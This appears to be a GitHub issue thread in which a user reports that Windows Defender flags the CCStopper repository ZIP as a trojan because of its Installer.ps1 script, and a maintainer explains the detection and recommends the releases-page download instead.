t4rra
commented
1 year ago Please don't use the Code -> Download ZIP option as it downloads the whole repository, including unnecessary files like the .gitignore which is only necessary for development, and the /web/ folder, which is accessed when you run the one line commands. The contents inside /src/ are zipped and uploaded onto the releases page, and I recommend that.
As for the virus detection, it's because of how the scripts in /web/ behave. The Installer.ps1 script essentially just downloads another script and runs it with some arguments. It's quite similar to how a trojan would behave by having a user download a script that looks trustworthy, then having that script download another script and running it.
What happened?
If I download CCStopper-main.zip from the main page (Code -> Download ZIP), Windows Defender goes off and deletes the file before I can try to do anything with it, stating the following:
Detected: Trojan:Script/Wacatac.H!ml containerfile: CCStopper-main.zip file: CCStopper-main.zip->CCStopper-main/web/Installer.ps1 webfile: CCStopper-main.zip|about:internet|pid:16836,ProcessStart:133362552658945170
However, if I download CCStopper.zip v1.2.3-hotfix.1 (current latest) from the releases page, there aren't any issues whatsoever and the experience is smooth and pleasant.
Expected Result?
I would expect that the download from the main page would be the latest, maybe I'm just not familiar with how GitHub works.
Either way, I am not happy that there is a virus detected in the one file. The other one worked as expected with zero virus alerts... a much better experience.
Thank you to the devs for making such an awesome program! I don't mean to come across as negative in any way, just wanting to share my experience.
Version?
v1.2.3-hotfix.1
Windows Version?
Windows 10 22H2
Duplicate Issues